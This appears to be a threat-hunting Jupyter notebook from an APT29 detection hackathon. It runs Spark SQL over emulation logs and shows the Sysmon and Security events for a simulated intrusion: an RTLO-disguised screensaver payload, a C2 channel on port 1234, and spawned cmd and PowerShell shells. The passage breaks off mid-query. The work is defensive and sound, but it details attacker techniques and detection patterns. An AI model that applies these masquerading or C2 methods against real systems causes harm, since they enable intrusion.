Contents

Free Telemetry Notebook

Group

APT29

Description

APT29 is a threat group that has been attributed to the Russian government and has operated since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015

Author

Open Threat Research - APT29 Detection Hackathon

Telemetry Detection Category

# Importing Libraries
from bokeh.io import show
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource, LabelSet, HoverTool
from bokeh.transform import dodge
import pandas as pd

# You need to run this code at the beginning in order to show visualization using Jupyter Notebooks
from bokeh.io import output_notebook
output_notebook()
apt29= pd.read_json('https://raw.githubusercontent.com/OTRF/ThreatHunter-Playbook/master/docs/evals/apt29/data/otr_results.json')
summary = (
    apt29
    .groupby(['step','stepname']).agg(total=pd.NamedAgg(column="substep", aggfunc="nunique"))
    .join(
        apt29[apt29['detectiontype'] == 'Telemetry']
        .groupby(['step','stepname']).agg(telemetry=pd.NamedAgg(column="vendor", aggfunc="count"))
    )
).reset_index()
summary['percentage'] = (summary['telemetry'] / summary['total']).map("{:.0%}".format)
# Get Total Average Telemetry coverage
total_avg_percentage = '{0:.0f}'.format((summary['telemetry'].sum() / summary['total'].sum() * 100))

# Lists of values to create ColumnDataSource
stepname = summary['stepname'].tolist()
total = summary['total'].tolist()
telemetry = summary['telemetry'].tolist()
percentage = summary['percentage'].tolist()

# Creating ColumnDataSource object: source of data for visualization
source = ColumnDataSource(data={'stepname':stepname,'sub-Steps':total,'covered':telemetry,'percentage':percentage})

# Defining HoverTool object (Display info with Mouse): It is applied to chart named 'needHover'
hover_tool = HoverTool(names = ['needHover'],tooltips = [("Covered", "@covered"),("Percentage", "@percentage")])

# Creating Figure
p = figure(x_range=stepname,y_range=(0,23),plot_height=550,plot_width=600,toolbar_location='right',tools=[hover_tool])

# Creating Vertical Bar Charts
p.vbar(x=dodge('stepname',0.0,range=p.x_range),top='sub-Steps',width=0.7,source=source,color="#c9d9d3",legend_label="Total")
p.vbar(x=dodge('stepname',0.0, range=p.x_range),top='covered',width=0.7,source=source,color="#718dbf",legend_label="Covered", name = 'needHover')

# Adding Legend
p.legend.location = "top_right"
p.legend.orientation = "vertical"
p.legend.border_line_width = 3
p.legend.border_line_color = "black"
p.legend.border_line_alpha = 0.3

# Adding Title
p.title.text = 'Telemetry Detection Category (Average Coverage: {}%)'.format(total_avg_percentage)
p.title.align = 'center'
p.title.text_font_size = '12pt'

# Adding Axis Labels
p.xaxis.axis_label = 'Emulation Steps'
p.xaxis.major_label_orientation = 45

p.yaxis.axis_label = 'Count of Sub-Steps'

# Adding Data Label: Only for total of sub-steps
total_label = LabelSet(x='stepname',y='sub-Steps',text='sub-Steps',text_align='center',level='glyph',source= source)
p.add_layout(total_label)

#Showing visualization
show(p)
Loading BokehJS ...

Import Libraries

from pyspark.sql import SparkSession

Start Spark Session

spark = SparkSession.builder.getOrCreate()
spark.conf.set("spark.sql.caseSensitive", "true")

Decompress Dataset

!wget https://github.com/OTRF/mordor/raw/master/datasets/large/apt29/day1/apt29_evals_day1_manual.zip
--2020-10-16 12:58:40--  https://github.com/OTRF/mordor/raw/master/datasets/large/apt29/day1/apt29_evals_day1_manual.zip
Resolving github.com (github.com)... 
140.82.112.4
Connecting to github.com (github.com)|140.82.112.4|:443... connected.
HTTP request sent, awaiting response... 
302 Found
Location: https://raw.githubusercontent.com/OTRF/mordor/master/datasets/large/apt29/day1/apt29_evals_day1_manual.zip [following]
--2020-10-16 12:58:40--  https://raw.githubusercontent.com/OTRF/mordor/master/datasets/large/apt29/day1/apt29_evals_day1_manual.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.200.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.200.133|:443... connected.
HTTP request sent, awaiting response... 
200 OK
Length: 13944973 (13M) [application/zip]
Saving to: ‘apt29_evals_day1_manual.zip’


          apt29_eva   0%[                    ]       0  --.-KB/s               
         apt29_eval   2%[                    ] 315.42K  1.46MB/s               
        apt29_evals   5%[>                   ] 798.74K  1.87MB/s               
       apt29_evals_  10%[=>                  ]   1.34M  2.17MB/s               
      apt29_evals_d  14%[=>                  ]   1.97M  2.39MB/s               
     apt29_evals_da  19%[==>                 ]   2.58M  2.50MB/s               
    apt29_evals_day  25%[====>               ]   3.37M  2.73MB/s               
   apt29_evals_day1  26%[====>               ]   3.54M  2.42MB/s               
  apt29_evals_day1_  27%[====>               ]   3.70M  2.15MB/s               
 apt29_evals_day1_m  30%[=====>              ]   4.06M  2.09MB/s               
apt29_evals_day1_ma  31%[=====>              ]   4.17M  1.89MB/s               
pt29_evals_day1_man  35%[======>             ]   4.65M  1.93MB/s               
t29_evals_day1_manu  40%[=======>            ]   5.37M  2.01MB/s               
29_evals_day1_manua  42%[=======>            ]   5.67M  1.97MB/s               
9_evals_day1_manual  47%[========>           ]   6.29M  2.04MB/s    eta 3s     
_evals_day1_manual.  49%[========>           ]   6.53M  1.90MB/s    eta 3s     
evals_day1_manual.z  50%[=========>          ]   6.76M  1.88MB/s    eta 3s     
vals_day1_manual.zi  51%[=========>          ]   6.90M  1.77MB/s    eta 3s     
als_day1_manual.zip  53%[=========>          ]   7.08M  1.69MB/s    eta 4s     
ls_day1_manual.zip   55%[==========>         ]   7.39M  1.63MB/s    eta 4s     
s_day1_manual.zip    57%[==========>         ]   7.59M  1.53MB/s    eta 4s     
_day1_manual.zip     61%[===========>        ]   8.14M  1.53MB/s    eta 4s     
day1_manual.zip      63%[===========>        ]   8.47M  1.35MB/s    eta 4s     
ay1_manual.zip       64%[===========>        ]   8.64M  1.36MB/s    eta 3s     
y1_manual.zip        69%[============>       ]   9.23M  1.47MB/s    eta 3s     
1_manual.zip         73%[=============>      ]   9.72M  1.53MB/s    eta 3s     
_manual.zip          75%[==============>     ]  10.09M  1.54MB/s    eta 3s     
manual.zip           77%[==============>     ]  10.29M  1.59MB/s    eta 3s     
anual.zip            79%[==============>     ]  10.54M  1.45MB/s    eta 2s     
nual.zip             80%[===============>    ]  10.67M  1.37MB/s    eta 2s     
ual.zip              82%[===============>    ]  10.92M  1.37MB/s    eta 2s     
al.zip               83%[===============>    ]  11.12M  1.26MB/s    eta 2s     
l.zip                85%[================>   ]  11.36M  1.29MB/s    eta 2s     
.zip                 86%[================>   ]  11.54M  1.30MB/s    eta 1s     
zip                  88%[================>   ]  11.73M  1.27MB/s    eta 1s     
ip                   89%[================>   ]  11.92M  1.24MB/s    eta 1s     
p                    92%[=================>  ]  12.25M  1.22MB/s    eta 1s     
                     94%[=================>  ]  12.58M  1.21MB/s    eta 1s     
                  a  98%[==================> ]  13.08M  1.27MB/s    eta 0s     
                 ap  99%[==================> ]  13.20M  1.13MB/s    eta 0s     
apt29_evals_day1_ma 100%[===================>]  13.30M  1.14MB/s    in 9.0s    

2020-10-16 12:58:49 (1.48 MB/s) - ‘apt29_evals_day1_manual.zip’ saved [13944973/13944973]
!unzip apt29_evals_day1_manual.zip
Archive:  apt29_evals_day1_manual.zip
  inflating: apt29_evals_day1_manual_2020-05-01225525.json  

Import Datasets

df_day1_host = spark.read.json('apt29_evals_day1_manual_2020-05-01225525.json')

Create Temporary SQL View

df_day1_host.createTempView('apt29Host')

Adversary - Detection Steps

1.A.1. User Execution

Procedure: User Pam executed payload rcs.3aka3.doc

Criteria: The rcs.3aka3.doc process spawning from explorer.exe

Detection Type:Telemetry(None)

Query ID:204B00B6-A92B-4EF7-8510-4FB237703147

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
    AND LOWER(ParentImage) LIKE "%explorer.exe"
    AND LOWER(Image) LIKE "%3aka3%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:55:56.157
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
CommandLine: "C:\ProgramData\victim\‮cod.3aka3.scr" /S
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=4B7FA56A4E85F88B98D11A6E018698AE3FBA5E62,MD5=9D1C5EF38E6073661C74660B3A71A76E,SHA256=0DF38A55D940F498478EB03683C94D4584236E100125B526A67650BA54DF4AE4,IMPHASH=F00447512A354E59D39D2818AABA4A17
ParentProcessGuid: {47ab858c-dac4-5eac-f202-000000000400}
ParentProcessId: 4440
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\windows\Explorer.EXE 

Query ID:52540C1E-DD76-41B2-93ED-CFBA2B94ECF7

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
    AND EventID = 4688
    AND LOWER(ParentProcessName) LIKE "%explorer.exe"
    AND LOWER(NewProcessName) LIKE "%3aka3%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x214c
	New Process Name:	C:\ProgramData\victim\‮cod.3aka3.scr
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0x1158
	Creator Process Name:	C:\Windows\explorer.exe
	Process Command Line:	"C:\ProgramData\victim\‮cod.3aka3.scr" /S

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

Detection Type:General(None)

Query ID:DFD6A782-9BDB-4550-AB6B-525E825B095E

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
  AND EventID = 13
  AND TargetObject RLIKE '.*\\\\\\\\AppCompatFlags\\\\\\\\Compatibility Assistant\\\\\\\\Store\\\\\\\\.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:01:29.278
ProcessGuid: {47ab858c-cc06-5eac-9402-000000000400}
ProcessId: 1144
Image: C:\windows\system32\svchost.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\ProgramData\victim\‮cod.3aka3.scr
Details: Binary Data 
-RECORD 1---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:21:27.385
ProcessGuid: {47ab858c-e737-5eac-fb00-000000000500}
ProcessId: 8460
Image: C:\windows\system32\svchost.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Windows\System32\hostui.exe
Details: Binary Data         
-RECORD 2---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:21:29.863
ProcessGuid: {47ab858c-e737-5eac-fb00-000000000500}
ProcessId: 8460
Image: C:\windows\system32\svchost.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Windows\System32\hostui.exe
Details: Binary Data         
-RECORD 3---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:21:29.863
ProcessGuid: {47ab858c-e737-5eac-fb00-000000000500}
ProcessId: 8460
Image: C:\windows\system32\svchost.exe
TargetObject: HKU\S-1-5-21-1830255721-3727074217-2423397540-1107\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Windows\System32\hostui.exe
Details: Binary Data         

1.A.2. Masquerading

Procedure: Used unicode right-to-left override (RTLO) character to obfuscate file name rcs.3aka3.doc (originally cod.3aka.scr)

Criteria: Evidence of the right-to-left override character (U+202E) in the rcs.3aka.doc process ​OR the original filename (cod.3aka.scr)

Detection Type:Telemetry(None)

Query ID:F4C71BF4-E068-493D-ABAA-0C5DFA02875D

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
    AND LOWER(Image) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:55:56.157
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
CommandLine: "C:\ProgramData\victim\‮cod.3aka3.scr" /S
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=4B7FA56A4E85F88B98D11A6E018698AE3FBA5E62,MD5=9D1C5EF38E6073661C74660B3A71A76E,SHA256=0DF38A55D940F498478EB03683C94D4584236E100125B526A67650BA54DF4AE4,IMPHASH=F00447512A354E59D39D2818AABA4A17
ParentProcessGuid: {47ab858c-dac4-5eac-f202-000000000400}
ParentProcessId: 4440
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\windows\Explorer.EXE 

Query ID:D94222A0-72F9-4F1E-84A9-F14CA1098D44

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
    AND EventID = 4688
    AND LOWER(NewProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x214c
	New Process Name:	C:\ProgramData\victim\‮cod.3aka3.scr
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0x1158
	Creator Process Name:	C:\Windows\explorer.exe
	Process Command Line:	"C:\ProgramData\victim\‮cod.3aka3.scr" /S

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

1.A.3. Uncommonly Used Port

Procedure: Established C2 channel (192.168.0.5) via rcs.3aka3.doc payload over TCP port 1234

Criteria: Established network channel over port 1234

Detection Type:Telemetry(None)

Query ID:B53A710B-43AB-4B57-BD92-4E787D494978

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 3
    AND LOWER(Image) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Network connection detected:
RuleName: -
UtcTime: 2020-05-02 02:55:59.631
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
User: DMEVALS\pbeesly
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 10.0.1.4
SourceHostname: -
SourcePort: 59835
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.0.5
DestinationHostname: -
DestinationPort: 1234
DestinationPortName: - 

Query ID:1BAC5645-83CD-4D6F-A4F8-659084401F47

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
  AND EventID = 5156
  AND LOWER(Application) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | The Windows Filtering Platform has permitted a connection.

Application Information:
	Process ID:		8524
	Application Name:	\device\harddiskvolume2\programdata\victim\‮cod.3aka3.scr

Network Information:
	Direction:		Outbound
	Source Address:		10.0.1.4
	Source Port:		59835
	Destination Address:	192.168.0.5
	Destination Port:		1234
	Protocol:		6

Filter Information:
	Filter Run-Time ID:	68659
	Layer Name:		Connect
	Layer Run-Time ID:	48 

1.A.4. Standard Cryptographic Protocol

Procedure: Used RC4 stream cipher to encrypt C2 (192.168.0.5) traffic

Criteria: Evidence that the network data sent over the C2 channel is encrypted

Detection Type:None(None)

Query ID:E12B701E-1222-413C-BCAF-F357CB769B3E

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
  AND EventID = 7
  AND Image LIKE "%3aka3%"
  AND LOWER(ImageLoaded) LIKE '%bcrypt.dll'

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Image loaded:
RuleName: -
UtcTime: 2020-05-02 02:55:56.949
ProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ProcessId: 8524
Image: C:\ProgramData\victim\‮cod.3aka3.scr
ImageLoaded: C:\Windows\System32\bcrypt.dll
FileVersion: 10.0.18362.267 (WinBuild.160101.0800)
Description: Windows Cryptographic Primitives Library
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: bcrypt.dll
Hashes: SHA1=421C35E0949143DE72C8F98776565D24815AD47E,MD5=F46778029BE7D755EBDCDF048EA62A4B,SHA256=907A4D1D405283AD24BBA1F9A763C5118A33574F3E0EC7FC543F65B24CC0A748,IMPHASH=E5649DCD6FA9472DB9A89CCD123913C0
Signed: true
Signature: Microsoft Windows
SignatureStatus: Valid 

1.B.1. Command-Line Interface

Procedure: Spawned interactive cmd.exe

Criteria: cmd.exe spawning from the rcs.3aka3.doc​ process

Detection Type:Telemetry(Correlated)

Query ID:4799C203-573A-49CB-ACE4-8C4C5CD3862A

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
  AND EventID = 1
  AND LOWER(ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
  AND LOWER(Image) LIKE "%cmd.exe"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:56:04.510
ProcessGuid: {47ab858c-e144-5eac-ab03-000000000400}
ProcessId: 2772
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.18362.449 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: "C:\windows\system32\cmd.exe"
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
ParentProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ParentProcessId: 8524
ParentImage: C:\ProgramData\victim\‮cod.3aka3.scr
ParentCommandLine: "C:\ProgramData\victim\‮cod.3aka3.scr" /S 
-RECORD 1--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Process Create:
RuleName: -
UtcTime: 2020-05-02 02:57:12.376
ProcessGuid: {47ab858c-e188-5eac-b003-000000000400}
ProcessId: 3480
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.18362.449 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: "C:\windows\system32\cmd.exe"
CurrentDirectory: C:\ProgramData\victim\
User: DMEVALS\pbeesly
LogonGuid: {47ab858c-dabe-5eac-f331-370000000000}
LogonId: 0x3731F3
TerminalSessionId: 2
IntegrityLevel: Medium
Hashes: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
ParentProcessGuid: {47ab858c-e13c-5eac-a903-000000000400}
ParentProcessId: 8524
ParentImage: C:\ProgramData\victim\‮cod.3aka3.scr
ParentCommandLine: "C:\ProgramData\victim\‮cod.3aka3.scr" /S 

Query ID:C8D664CD-48EE-4663-AE49-D5B0B19014C7

df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE LOWER(Channel) = "security"
  AND EventID = 4688
  AND LOWER(ParentProcessName) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
  AND LOWER(NewProcessName) LIKE "%cmd.exe"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xad4
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0x214c
	Creator Process Name:	C:\ProgramData\victim\‮cod.3aka3.scr
	Process Command Line:	"C:\windows\system32\cmd.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 
-RECORD 1----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | A new process has been created.

Creator Subject:
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x3731F3

Target Subject:
	Security ID:		S-1-0-0
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xd98
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		S-1-16-8192
	Creator Process ID:	0x214c
	Creator Process Name:	C:\ProgramData\victim\‮cod.3aka3.scr
	Process Command Line:	"C:\windows\system32\cmd.exe"

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

1.B.2. PowerShell

Procedure: Spawned interactive powershell.exe

Criteria: powershell.exe spawning from cmd.exe

Detection Type:Telemetry(Correlated)

Query ID:C1DBF5F2-21D5-45E4-8D9A-44905F1F8242

df = spark.sql(
'''
SELECT Message
FROM apt29Host a
INNER JOIN (
    SELECT ProcessGuid
    FROM apt29Host
    WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
        AND EventID = 1
        AND LOWER(ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
        AND LOWER(Image) LIKE '%cmd.exe'
) b
ON a.ParentProcessGuid = b.ProcessGuid
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 1
